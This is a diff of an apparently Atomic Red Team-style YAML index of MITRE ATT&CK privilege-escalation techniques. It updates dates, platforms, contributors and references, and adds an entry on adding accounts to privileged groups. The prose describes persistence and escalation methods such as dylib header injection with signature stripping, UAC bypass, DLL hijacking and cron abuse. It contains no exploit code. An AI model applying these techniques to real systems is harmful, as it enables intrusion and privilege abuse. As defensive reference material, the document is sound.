         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15798,11 +16066,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15860,14 +16127,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15968,7 +16234,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15999,7 +16264,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16033,13 +16298,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16058,7 +16321,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16072,7 +16334,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16099,8 +16360,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16131,12 +16392,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16208,9 +16470,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16226,12 +16488,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16306,12 +16567,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16331,9 +16591,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16353,9 +16618,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16372,6 +16636,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16405,7 +16673,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16561,31 +16828,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16602,6 +16849,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16612,9 +16860,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16622,13 +16874,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16658,6 +16926,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16668,6 +16937,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16676,13 +16946,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16724,9 +16994,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16794,19 +17061,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16822,8 +17088,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16837,7 +17103,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16863,6 +17129,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16890,12 +17160,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16921,7 +17190,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16963,7 +17232,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17041,11 +17309,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17125,7 +17392,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17148,7 +17485,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17196,8 +17533,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17229,7 +17564,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17284,13 +17619,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17351,9 +17684,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17362,7 +17695,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17415,7 +17747,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17436,12 +17768,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17544,7 +17875,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17644,12 +17974,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17662,7 +17991,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
